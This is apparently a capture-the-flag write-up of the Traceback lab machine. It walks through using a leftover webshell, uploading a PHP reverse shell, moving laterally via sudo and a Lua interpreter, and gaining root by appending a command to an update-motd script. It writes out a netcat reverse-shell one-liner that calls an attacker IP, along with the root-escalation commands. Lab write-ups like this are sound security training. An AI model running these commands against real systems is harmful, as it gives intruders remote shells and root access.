System Summary
Initial Enumeration
The nmap scan reveals only SSH and HTTP
The main web page shows a simple web page:
Looking in the Github repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying their names against the Traceback machine we can see there is one running:
Initial FootHold
Using admin:admin we can get access to a panel where we can upload files, list contents of directories etc...Our first objective is to upload a php reverse shell (there are many on the internet) and get a shell:
We're in as user webadmin.
Next step is to enumerate other users
User Flag
There is another user named sysadmin:There is a note file in the webadmin home:
LUA is a scripting language.
It seems also that user webadmin can run luvit (lua interpreter) as user sysdamin via sudo (no Password)
The obvious step here is to create a script like /tmp/nik.lua
1 | os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")
|
and run it as
1 | sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua |
And get a shell as sysadmin
Root Flag
As sysadmin thhe next step is enumeration with tools like LinEnum or similar.But it seems that there is nothing interesting
Looking with pspy to see running processes we can see that there is a recurrent task:
There is a process (running as root) that copies files from /var/backups/.update-motd.d/ to /etc/update-motd.d every 1 minute.
Interesting... looks something that cleans corrupted files..
Infact user sysdamin can modify all files in /etc/
The interesting thing is that sshd will run this file as root to show the MOTD and additional messages to all ssh session created.
So we can modify one the files above to run command as root and gain access, but we have to be fast because in one minute the file will be cleaned up.
The sequence of operation to do is:
- Add our public ssh key to /home/sysadmin/.ssh/authorized_keys (so we can get access and also upload our key for further use)
- Run the command echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header adding our code to be executed at next ssh session
- Logon as sysadmin by ssh (we should be able to do this as we added the key). This operation should result in execution of cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys
- Logon as root (the previous command should have added our key to root authorized keys)